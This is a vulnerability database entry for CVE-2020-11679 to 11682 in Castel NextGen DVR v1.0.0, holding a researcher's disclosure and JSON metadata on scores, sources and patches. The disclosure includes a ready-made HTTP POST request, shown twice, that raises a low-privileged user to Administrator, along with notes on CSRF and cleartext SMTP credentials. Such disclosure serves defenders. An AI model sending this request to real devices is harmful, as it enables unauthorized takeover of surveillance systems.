VAR-202006-0042
Vulnerability from variot - Updated: 2023-12-18 12:27Castel NextGen DVR v1.0.0 is vulnerable to privilege escalation through the Adminstrator/Users/Edit/:UserId functionality. Adminstrator/Users/Edit/:UserId fails to check that the request was submitted by an Administrator. This allows a normal user to escalate their privileges by adding additional roles to their account. Castel NextGen DVR Exists in a privilege management vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state.
The Castel NextGen DVR management function has security vulnerabilities, allowing remote attackers to use the vulnerabilities to submit special requests, elevate permissions, and obtain administrator permissions. All issues are associated with Castel NextGen DVR v1.0.0 and have been resolved in v1.0.1.
CVE-2020-11679 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11679
Original Disclosure https://www.securitymetrics.com/blog/attackers-known-unknown-authorization-bypass
Description A low privileged user can call functionality reserved for an Administrator which promotes a low privileged account to the Administrator role:
POST /Administration/Users/Edit/:ID HTTP/1.1
Host: $RHOST User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: $REVIEWER_COOKIES DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 349
UserId=:ID&Email=bypass%40test.com &FirstName=bypass&LastName=bypass&LDAPUser=false
&Roles%5B0%5D.RoleId=1&Roles%5B0%5D.IsSelected=true&Roles%5B0%5D.IsSelected=false
&Roles%5B1%5D.RoleId=3&Roles%5B1%5D.IsSelected=true&Roles%5B1%5D.IsSelected=false
&Roles%5B2%5D.RoleId=5&Roles%5B2%5D.IsSelected=true&Roles%5B2%5D.IsSelected=false &Locked=false
CVE-2020-11680 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11680
Original Disclosure https://www.securitymetrics.com/blog/attackers-known-unknown-authorization-bypass
Description The application does not perform an authorization check before functionality is performed. Low privileged users are prevented from browsing to pages that perform Administrator functionality using GET, however, functionality can be performed by directly crafting the associated POST request. This can be exploited to modify user accounts, modify the application, etc. Combined with the reported CSRF, CVE-2020-11682, any user of the application can be used to grant Administrator access to a malicious user.
CVE-2020-11681 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11681
Original Disclosure https://www.securitymetrics.com/blog/attackers-known-unknown-authorization-bypass
Description Credentials are returned in cleartext in the source of the SMTP page. If a malicious user compromises an account. or exploits the CSRF to gain access to the application, the associated SMTP server/account could also be compromised.
CVE-2020-11682 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11682
Original Disclosure https://www.securitymetrics.com/blog/where-did-request-come-from-cross-site-request-forgery-csrf
Description The application does not properly prevent CSRF; the __RequestVerificationToken, which is included with state changing requests, is not verified by the application - requests are successful even when the token is removed.
AARON BISHOP | Principal Penetration Tester CISSP, OSCP, OSWE [image: SecurityMetrics]
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202006-0042",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "nextgen dvr",
"scope": "eq",
"trust": 2.4,
"vendor": "castel",
"version": "1.0.0"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-24898"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006190"
},
{
"db": "NVD",
"id": "CVE-2020-11679"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:castel:nextgen_dvr_firmware:1.0.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:castel:nextgen_dvr:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-11679"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Aaron Bishop",
"sources": [
{
"db": "PACKETSTORM",
"id": "157954"
},
{
"db": "CNNVD",
"id": "CNNVD-202006-501"
}
],
"trust": 0.7
},
"cve": "CVE-2020-11679",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "Single",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 6.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2020-006190",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CNVD-2021-24898",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "VULMON",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CVE-2020-11679",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "MEDIUM",
"trust": 0.1,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2020-006190",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2020-11679",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "JVNDB-2020-006190",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2021-24898",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202006-501",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2020-11679",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-24898"
},
{
"db": "VULMON",
"id": "CVE-2020-11679"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006190"
},
{
"db": "NVD",
"id": "CVE-2020-11679"
},
{
"db": "CNNVD",
"id": "CNNVD-202006-501"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Castel NextGen DVR v1.0.0 is vulnerable to privilege escalation through the Adminstrator/Users/Edit/:UserId functionality. Adminstrator/Users/Edit/:UserId fails to check that the request was submitted by an Administrator. This allows a normal user to escalate their privileges by adding additional roles to their account. Castel NextGen DVR Exists in a privilege management vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. \n\r\n\r\nThe Castel NextGen DVR management function has security vulnerabilities, allowing remote attackers to use the vulnerabilities to submit special requests, elevate permissions, and obtain administrator permissions. All issues are associated with *Castel NextGen DVR v1.0.0 *and have been\nresolved in v1.0.1*.*\n\n-------------------------------\n*CVE-2020-11679\n\u003chttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11679\u003e*\n\n\n*Original Disclosure*\nhttps://www.securitymetrics.com/blog/attackers-known-unknown-authorization-bypass\n\n*Description*\nA low privileged user can call functionality reserved for an Administrator\nwhich promotes a low privileged account to the Administrator role:\n\nPOST /Administration/Users/Edit/:ID HTTP/1.1\n\u003e Host: $RHOST\n\u003e User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101\n\u003e Firefox/52.0\n\u003e Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\n\u003e Accept-Language: en-US,en;q=0.5\n\u003e Accept-Encoding: gzip, deflate\n\u003e Cookie: $REVIEWER_COOKIES\n\u003e DNT: 1\n\u003e Connection: close\n\u003e Upgrade-Insecure-Requests: 1\n\u003e Content-Type: application/x-www-form-urlencoded\n\u003e Content-Length: 349\n\n\n\u003e UserId=:ID\u0026Email=bypass%40test.com\n\u003e \u0026FirstName=bypass\u0026LastName=bypass\u0026LDAPUser=false\n\u003e\n\u003e \u0026Roles%5B0%5D.RoleId=1\u0026Roles%5B0%5D.IsSelected=true\u0026Roles%5B0%5D.IsSelected=false\n\u003e\n\u003e \u0026Roles%5B1%5D.RoleId=3\u0026Roles%5B1%5D.IsSelected=true\u0026Roles%5B1%5D.IsSelected=false\n\u003e\n\u003e \u0026Roles%5B2%5D.RoleId=5\u0026Roles%5B2%5D.IsSelected=true\u0026Roles%5B2%5D.IsSelected=false\n\u003e \u0026Locked=false\n\n-------------------------------\n*CVE-2020-11680\n\u003chttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11680\u003e*\n\n*Original Disclosure*\nhttps://www.securitymetrics.com/blog/attackers-known-unknown-authorization-bypass\n\n*Description*\nThe application does not perform an authorization check before\nfunctionality is performed. Low privileged users are prevented from\nbrowsing to pages that perform Administrator functionality using GET,\nhowever, functionality can be performed by directly crafting the associated\nPOST request. This can be exploited to modify user accounts, modify the\napplication, etc. Combined with the reported CSRF, CVE-2020-11682, any\nuser of the application can be used to grant Administrator access to a\nmalicious user. \n-------------------------------\n*CVE-2020-11681\n\u003chttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11681\u003e*\n\n*Original Disclosure*\nhttps://www.securitymetrics.com/blog/attackers-known-unknown-authorization-bypass\n\n*Description*\nCredentials are returned in cleartext in the source of the SMTP page. If a\nmalicious user compromises an account. or exploits the CSRF to gain access\nto the application, the associated SMTP server/account could also be\ncompromised. \n-------------------------------\n*CVE-2020-11682\n\u003chttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11682\u003e*\n\n*Original Disclosure*\nhttps://www.securitymetrics.com/blog/where-did-request-come-from-cross-site-request-forgery-csrf\n\n*Description*\nThe application does not properly prevent CSRF; the\n__RequestVerificationToken, which is included with state changing requests,\nis not verified by the application - requests are successful even when the\ntoken is removed. \n\nAARON BISHOP | Principal Penetration Tester CISSP, OSCP, OSWE [image:\nSecurityMetrics]\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-11679"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006190"
},
{
"db": "CNVD",
"id": "CNVD-2021-24898"
},
{
"db": "VULMON",
"id": "CVE-2020-11679"
},
{
"db": "PACKETSTORM",
"id": "157954"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-11679",
"trust": 3.2
},
{
"db": "PACKETSTORM",
"id": "157954",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006190",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2021-24898",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202006-501",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2020-11679",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-24898"
},
{
"db": "VULMON",
"id": "CVE-2020-11679"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006190"
},
{
"db": "PACKETSTORM",
"id": "157954"
},
{
"db": "NVD",
"id": "CVE-2020-11679"
},
{
"db": "CNNVD",
"id": "CNNVD-202006-501"
}
]
},
"id": "VAR-202006-0042",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-24898"
}
],
"trust": 1.2666667
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-24898"
}
]
},
"last_update_date": "2023-12-18T12:27:28.739000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Digital Video Recorder (DVR)",
"trust": 0.8,
"url": "http://castle-cctv.kr/digital-video-recorder-dvr/"
},
{
"title": "Patch for Castel NextGen DVR management function privilege escalation vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/255911"
},
{
"title": "Castel NextGen DVR Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=121159"
},
{
"title": "CVEs",
"trust": 0.1,
"url": "https://github.com/irbishop/cves "
},
{
"title": "CVEs",
"trust": 0.1,
"url": "https://github.com/irbishop/cve "
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-24898"
},
{
"db": "VULMON",
"id": "CVE-2020-11679"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006190"
},
{
"db": "CNNVD",
"id": "CNNVD-202006-501"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-862",
"trust": 1.0
},
{
"problemtype": "CWE-269",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-006190"
},
{
"db": "NVD",
"id": "CVE-2020-11679"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.7,
"url": "http://packetstormsecurity.com/files/157954/castel-nextgen-dvr-1.0.0-bypass-csrf-disclosure.html"
},
{
"trust": 1.8,
"url": "https://www.securitymetrics.com/blog/attackers-known-unknown-authorization-bypass"
},
{
"trust": 1.8,
"url": "http://seclists.org/fulldisclosure/2020/jun/8"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11679"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-11679"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/862.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/irbishop/cves"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11680"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-11679\u003e*"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-11681\u003e*"
},
{
"trust": 0.1,
"url": "https://www.securitymetrics.com/blog/where-did-request-come-from-cross-site-request-forgery-csrf"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11681"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-11680\u003e*"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-11682"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-11682\u003e*"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-24898"
},
{
"db": "VULMON",
"id": "CVE-2020-11679"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006190"
},
{
"db": "PACKETSTORM",
"id": "157954"
},
{
"db": "NVD",
"id": "CVE-2020-11679"
},
{
"db": "CNNVD",
"id": "CNNVD-202006-501"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-24898"
},
{
"db": "VULMON",
"id": "CVE-2020-11679"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-006190"
},
{
"db": "PACKETSTORM",
"id": "157954"
},
{
"db": "NVD",
"id": "CVE-2020-11679"
},
{
"db": "CNNVD",
"id": "CNNVD-202006-501"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-04-04T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-24898"
},
{
"date": "2020-06-04T00:00:00",
"db": "VULMON",
"id": "CVE-2020-11679"
},
{
"date": "2020-07-02T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-006190"
},
{
"date": "2020-06-05T18:19:24",
"db": "PACKETSTORM",
"id": "157954"
},
{
"date": "2020-06-04T19:15:12.693000",
"db": "NVD",
"id": "CVE-2020-11679"
},
{
"date": "2020-06-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202006-501"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-04-06T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-24898"
},
{
"date": "2021-07-21T00:00:00",
"db": "VULMON",
"id": "CVE-2020-11679"
},
{
"date": "2020-07-02T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-006190"
},
{
"date": "2021-07-21T11:39:23.747000",
"db": "NVD",
"id": "CVE-2020-11679"
},
{
"date": "2021-01-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202006-501"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202006-501"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Castel NextGen DVR Vulnerability related to authority management in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-006190"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "other",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202006-501"
}
],
"trust": 0.6
}
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.